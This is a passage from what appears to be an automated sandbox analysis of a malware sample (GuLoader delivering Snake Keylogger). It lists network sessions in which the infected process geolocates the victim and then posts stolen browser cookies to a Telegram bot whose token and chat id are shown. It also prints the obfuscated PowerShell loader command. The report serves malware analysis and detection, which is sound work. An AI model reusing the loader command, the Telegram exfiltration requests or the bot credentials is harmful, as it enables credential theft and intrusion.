                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309924
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hoyMM%2Fh7sQD7j%2FSjjqYnuN2rKUxKJ3%2FwxI0qI%2BZ56LBJerOd0ILhBoKSTuypVmVunAH7n4gk66wJerZD0kku4PkzsaLgU2uNVKWPhfR1VZRb%2F7kT5WnVFpyZX66wcgS3crS97SFY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c0798b7572b9-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1807&rtt_var=756&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1615938&cwnd=233&unsent_bytes=0&cid=282c1b247ce290a7&ts=165&x=0"
                                                                                                                                                    2025-02-20 19:02:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    6192.168.2.749985104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    2025-02-20 19:02:37 UTC860INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:37 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309925
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zBQX%2BR0YvW%2BbVu6Fn4VhjB%2B7VsJ%2BmTLCauaHlJbu9m3iINEKkETjzsPcxer6YDIIj1ZTJS97BbkFeQgy8bXfM2XTEPl%2B3WmG6ZJdXwVDLUvzIlGoTrlNSUZBeYnaFlj4x1oobch%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c0819eda1875-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1769&min_rtt=1768&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1642294&cwnd=183&unsent_bytes=0&cid=5bb163fa3071e967&ts=149&x=0"
                                                                                                                                                    2025-02-20 19:02:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    7192.168.2.749987104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    2025-02-20 19:02:38 UTC854INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:38 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309926
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RRE4ZWWDSn6m976kfLQc2WKsH%2Bk7GcAFHMFQliKkgssH7gluHC7ZWjJYyXjUWcLUv0dQqAOqxwEV%2BoaAgpEAzH2LD84nsV5H1GQZeegGFef%2F63LYmTbkdX87qzTDWg790uQYuizs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c089dd87c327-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1584&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1788120&cwnd=215&unsent_bytes=0&cid=ba7626ac2d1fdfd1&ts=164&x=0"
                                                                                                                                                    2025-02-20 19:02:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    8192.168.2.749989104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:39 UTC854INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:39 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309928
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N5QiQeftP4i9AsPKF2BZjrCDqGjLuWohvtpD5ioM0jxvUoJcHM7JGlMAA7vVBZXnRqRA5cF%2FtA4JaXOt0h7%2FvnKmmf9CSA9SBA2WPfQJtP2Hvp40vQqdkIWwAe4izJ%2Bxe3q7Wl8N"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c092592941a6-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1614&rtt_var=607&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1798029&cwnd=245&unsent_bytes=0&cid=4c9142342f1e67b4&ts=183&x=0"
                                                                                                                                                    2025-02-20 19:02:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    9192.168.2.749991104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:41 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    2025-02-20 19:02:41 UTC860INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:41 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309929
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3dT41tQWTAPPn6ihwihkY00caQknkJgTWL8trQ80t%2BJ4ydM2%2B1wtJO07sXZ7jHy9%2B%2FqhSxXiXLeVuadF19f7aYnzAnkTuiNJcOSYtqyJu0%2BhMeRIP5bO07a5lJOe6%2FMAfQwft4T"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c09adb9b4344-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1698&rtt_var=645&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1719670&cwnd=137&unsent_bytes=0&cid=479418c3109cf0dd&ts=135&x=0"
                                                                                                                                                    2025-02-20 19:02:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    10192.168.2.749993104.21.32.14438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                    Host: reallyfreegeoip.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:42 UTC851INHTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:42 GMT
                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                    Content-Length: 362
                                                                                                                                                    Connection: close
                                                                                                                                                    Age: 309930
                                                                                                                                                    Cache-Control: max-age=31536000
                                                                                                                                                    cf-cache-status: HIT
                                                                                                                                                    last-modified: Mon, 17 Feb 2025 04:57:11 GMT
                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ze2a8GWhBcoB1lBhOxsxC6qk6Ki8OlqBXDWKQUhYHZbOKNVpRWx8JWpMxeVa%2BoQBsW5hh6yDKXpwl4BNDyJD1CPDkjq7gsVdT1DRpxy4qJaikTJWW7U3b5%2Fi9dRO30WK3IZNKbJA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9150c0a36d088ce6-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1801&min_rtt=1801&rtt_var=900&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=172373&cwnd=172&unsent_bytes=0&cid=7514f8fc08e3b0e9&ts=187&x=0"
                                                                                                                                                    2025-02-20 19:02:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    11192.168.2.749994149.154.167.2204438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:43 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:320946%0D%0ADate%20and%20Time:%2021/02/2025%20/%2004:32:14%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20320946%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-02-20 19:02:43 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:43 GMT
                                                                                                                                                    Content-Type: application/json
                                                                                                                                                    Content-Length: 55
                                                                                                                                                    Connection: close
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                    2025-02-20 19:02:43 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    12192.168.2.749995149.154.167.2204438180C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-02-20 19:02:50 UTC358OUTPOST /bot7905739203:AAHVrbaqwZh7jsUdl3dYwh5_SurA4XOPFCU/sendDocument?chat_id=8187594209&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd5298a6722ded
                                                                                                                                                    Host: api.telegram.org
                                                                                                                                                    Content-Length: 1282
                                                                                                                                                    2025-02-20 19:02:50 UTC1282OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 32 39 38 61 36 37 32 32 64 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 43 6f 6f 6b 69 65 73 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 33 32 30 39 34 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 30 2f 30 32 2f 32 30
                                                                                                                                                    Data Ascii: --------------------------8dd5298a6722dedContent-Disposition: form-data; name="document"; filename="Cookies_Recovered.txt"Content-Type: application/x-ms-dos-executableCookies | user | VIP Recovery PC Name:320946Date and Time: 20/02/20
                                                                                                                                                    2025-02-20 19:02:50 UTC388INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                    Date: Thu, 20 Feb 2025 19:02:50 GMT
                                                                                                                                                    Content-Type: application/json
                                                                                                                                                    Content-Length: 506
                                                                                                                                                    Connection: close
                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                    2025-02-20 19:02:50 UTC506INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 30 35 37 33 39 32 30 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 74 72 61 64 69 6e 67 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 74 72 61 64 69 6e 67 70 61 74 7a 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 38 31 38 37 35 39 34 32 30 39 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 55 67 6f 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 30 30 37 38 31 37 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 43 6f 6f 6b 69 65 73 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 2c
                                                                                                                                                    Data Ascii: {"ok":true,"result":{"message_id":17,"from":{"id":7905739203,"is_bot":true,"first_name":"trading","username":"tradingpatz_bot"},"chat":{"id":8187594209,"first_name":"Ugo","type":"private"},"date":1740078170,"document":{"file_name":"Cookies_Recovered.txt",


                                                                                                                                                    Statistics

                                                                                                                                                    CPU Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    Memory Usage

                                                                                                                                                    Click to jump to process

                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                    Behavior

                                                                                                                                                    Click to jump to process

                                                                                                                                                    System Behavior

                                                                                                                                                    General

                                                                                                                                                    Target ID:1
                                                                                                                                                    Start time:14:01:20
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Users\user\Desktop\rAntephialtic.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\rAntephialtic.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:1'542'704 bytes
                                                                                                                                                    MD5 hash:65249FEBEC3F7BDE1C51B92FF5D3C4A7
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:14:01:24
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"powershell.exe" -windowstyle minimized "$Anskueliggres=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Kinestheses.Tra';$Sprrereglernes=$Anskueliggres.SubString(54058,3);.$Sprrereglernes($Anskueliggres)"
                                                                                                                                                    Imagebase:0xfa0000
                                                                                                                                                    File size:433'152 bytes
                                                                                                                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000003.00000002.1830778551.000000000CF10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:4
                                                                                                                                                    Start time:14:01:24
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                    Imagebase:0x7ff75da10000
                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:high
                                                                                                                                                    Has exited:true

                                                                                                                                                    General

                                                                                                                                                    Target ID:6
                                                                                                                                                    Start time:15:57:12
                                                                                                                                                    Start date:20/02/2025
                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                    Imagebase:0x420000
                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2558138839.0000000025681000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
